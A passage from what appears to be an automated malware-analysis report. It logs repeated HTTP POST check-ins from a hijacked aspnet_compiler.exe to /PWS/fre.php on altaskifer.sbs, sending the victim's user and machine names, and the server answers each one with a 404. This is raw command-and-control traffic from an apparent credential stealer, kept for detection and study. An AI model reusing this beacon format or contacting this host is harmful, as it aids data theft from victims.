                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YjJwvUElWxyjGKnq9Ky7wxyXMg4u0mTfawc9Ijcwhe1yUpqml2v4t6UhDZRYiMmmzcVNOxS%2Bdqa0rofL%2BoQh4Sf32zWlcdijIIK4kOpADoG4RD6%2FnCBcZS%2BqfRkHGNGjAw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700124d6e7fda83-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                60192.168.2.649787172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:15.972978115 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:16.109186888 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:16.844116926 CEST597INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:16 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qt2v6rNNDN8wBhQ0T2ngmJkpzLosI%2FXQqh764gGYFihJO3JuK0r02n2zcAxP4ZiI0J3kmyB5zk2T5onYagRMIHiqMrkXDbkyroao3IkFFQbvR2H5megjvCwHEhvzUfm1SQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012524cdadaa9-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                61192.168.2.649788172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:17.112020969 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:17.235830069 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:17.620068073 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:17 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vXjH8gyu5sI8sEgmqqtxSdOWJfNVKN5SYhlpaGnGJt5owLwqNz5ihp8FWgan%2B33%2BL%2FCW5U98lw3wFv2PULXiq8ye%2B58n55475GtLAfKDYhfkNh1ud8GsftXErjjfX1YDlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012595dc3dafd-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                62192.168.2.649789172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:17.895021915 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:18.018956900 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:18.399833918 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:18 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jUGBHPQqTTJ%2F0%2F9RMPq8nmRQ77oDv7x9sXz8kqY11%2Ba24Wl96Av9ws2EeE0S7QuRH9ZkPEMTN3xklDRsYHu5mSErNHPJR4SfMN2CcWjocs%2BoOgQpuJZJLU1ObwwqabjETA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700125e3f9b9aef-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                63192.168.2.649790172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:18.674487114 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:18.799104929 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:19.169862032 CEST599INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:19 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VFb8fynM98Cq7W7RU%2BIXPo0IEcbAlGC94r9I6h3rbRLSf8wzQ%2Fkxy4mUcWDruhpgARf8ZSyXtS5M7WD3drKPK4O8rJMWFnAbJCHW18s8KqbVv0qkugJUqdM4ng2MyvpTNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012631bdc7425-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                64192.168.2.649791172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:19.440133095 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:19.564436913 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:19.939126968 CEST607INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:19 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nAUuJNb1JeodDMjtSVo4u7eKmWAeb1HUj7%2BkUgG7XYn%2B%2BP2FYKR5p8%2BhXdEYyK9OcgcDcib1%2BYyARgiIVpB4%2Fgev2iO3SEVOtUONG48mFc3uEEBYLR7s2FfxFecvIHcVeg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001267e991336e-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                65192.168.2.649792172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:20.206304073 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:20.330866098 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:20.703933001 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:20 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NSvPD8%2FdGTkLhD9RPbD3jeec39d1T0P2lZD5d%2B3UcMKzq4RBUIIl85Nv4zmNTQAVvZwkyuzbOEYy%2F42be5254zU8q2yZUPBb60lgQIVEowK%2FgGgbDpcWo44EJ5J9mA2HHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700126cbccba581-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                66192.168.2.649793172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:20.970309973 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:21.094136953 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:21.460465908 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:21 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7%2Fgq58GDnT02%2BRYIilL2ofIB946j8NE2bwPOtKHsWpm4DED9D0%2FOSd%2BnJ8c5zH6kNaIIG89t4TDPwFAjBtGoFjvkNhpaU9Ft7muzm%2BFyEgbgej45DFKVlr8D56FbQ69D6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012717e446c87-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                67192.168.2.649794172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:21.735500097 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:21.859711885 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:22.237138033 CEST605INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:22 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xhnZN9ts4RCNj7FgnFLFAj%2BZ8jQAp6CYBYpuvwfx0wWOQxuuLE2BghGlX0pV%2F1zq%2Bt7Gq%2FNYZXYhmGEWDY%2BQRyZdHzq1mzYdBZXsPitKoLHHJ2xcKDo2JrNpdiy1U5TJ1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 870012763f793dd3-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                68192.168.2.649795172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:22.504190922 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:22.627902985 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:23.013819933 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:22 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AKN68DMbL8v0GuYIwVr7ht7SbUJWsfR5hH8PdegMlpVlFvBP%2Fj8UNcA52vgLHCA7tWacvJIQntAexla%2Bk%2B4CGJ%2FJtNR407z5LbZWUw2XAlwR6gz4A8uJgOFEcC5IzRa2jA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700127b0dd69ab7-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                69192.168.2.649796172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:23.301208019 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:23.425993919 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:23.815175056 CEST603INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:23 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BEohaYpeqh8p6LNWGQLHpyXchu2yL6syDMtZ2X1ItEn%2FD6mWeWpj%2B3fcRDIz2od%2Fmg5CFsoW2s4Cm73Kvtt91IGlhaJNJ49DuaHXgmdCgxE9ZKGh89NgYjBlNwSf3SeEkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001280081aa4cd-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                70192.168.2.649797172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:24.081981897 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:24.206535101 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:24.592781067 CEST595INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:24 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5J4NHIlitFD4ErDgVcliQ77jybBd94uEVoNs7yyPL1hXWQ9sOinvutGqq0EBaInl8yHUXk0TYTr4zNvTcErANmKDWLhqt4RHHmSWLHuUUnXxOOtul6oG5mcPjcPK2TiUCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001284e9d35c6a-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                71192.168.2.649798172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:24.862545967 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:24.986743927 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:25.372438908 CEST607INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:25 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N66M2Q1wyrm5PMvSMeFtDJKo5xCDv002xcH%2F%2BNgTzM5BFgVVbXzCa6h2FR87vYWJHVa1GbhTEVA%2Bg3WD9blpa9e%2BXRkI1LQzroMMWS1i6J2Zhh%2FlU%2BoTMTfob2E2M5s1Fg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 87001289ce77a524-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                72192.168.2.649799172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:25.641171932 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:25.764785051 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:26.148691893 CEST607INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:26 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w5FEmxsuekXb05rYBlCiPDt%2Fl4X1YbrP8et%2FieljZ%2BhNRIN7wQhz0jhRKM77mVnWMTARl01ejwdsmPQ1WEIbvmNCu9ZhopPX25an4ilCuQQR1YkY%2FByaie%2FnkWD0Iq%2FXmg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8700128ead2d9ab3-MIA
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                Data Ascii: File not found.


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                73192.168.2.649800172.67.148.126804596C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 6, 2024 09:30:26.424765110 CEST238OUTPOST /PWS/fre.php HTTP/1.0
                                                User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                Host: altaskifer.sbs
                                                Accept: */*
                                                Content-Type: application/octet-stream
                                                Content-Encoding: binary
                                                Content-Key: 2FD79934
                                                Content-Length: 161
                                                Connection: close
                                                Apr 6, 2024 09:30:26.549029112 CEST161OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 32 00 30 00 39 00 34 00 36 00 01 00 16 00 00 00 45 00 4e 00 47 00 49 00 4e 00 45 00 45 00 52 00 2d 00 50
                                                Data Ascii: (ckav.ruengineer320946ENGINEER-PC0FDD42EE188E931437F4FBE2C
                                                Apr 6, 2024 09:30:26.935693026 CEST607INHTTP/1.1 404 Not Found
                                                Date: Sat, 06 Apr 2024 07:30:26 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Connection: close
                                                Status: 404 Not Found
                                                CF-Cache-Status: DYNAMIC
